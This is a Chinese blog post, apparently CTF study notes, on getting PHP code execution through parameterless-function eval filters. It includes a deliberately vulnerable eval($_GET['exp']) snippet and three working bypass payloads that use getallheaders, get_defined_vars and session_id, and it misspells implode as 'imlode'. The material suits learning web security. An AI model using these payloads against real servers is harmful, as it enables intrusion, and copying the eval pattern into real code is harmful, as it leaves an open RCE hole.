标签：函数 vars get session 参数 数组 eval rce

无参指的是所用的函数都不带参数   关键代码与下面类似

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['exp'])) {
eval($_GET['exp']);
}
?>

这里学习了一些方式：

1、getallheaders()

构造payload：eval(imlode(getallheaders()));

eval（）把（）内字符串当php代码执行

impload（）将一个一维数组转化成字符串

getallheaders（）以数组的形式返回所有http头信息

返回信息从请求头的最后往上输出，所以可以在请求头的最后加入我们的恶意代码，再加上注释符将后面的内容注释掉

2、get_defined_vars()

构造payload：eval(end(current(get_defined_vars())));

 因为get传进的参数回放在数组的最后，所以利用end函数来定位

get_defined_vars()用于返回一个二维数组来显示所有已定义的变量，因为是二维数组，所以没法用impload（）函数

要使用current（）函数返回该二维数组的第一个一维数组

3.session_id

payload: eval(hex2bin(session_id(session_start())));

如图，将所需要传入的恶意代码加密成16进制并修改phpsessid

• highlight_file() 函数对文件进行语法高亮显示，本函数是show_source() 的别名  可以将php文件读出，获取flag

标签：函数,vars,get,session,参数,数组,eval,rce
来源： https://www.cnblogs.com/heartbeat111/p/16518720.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。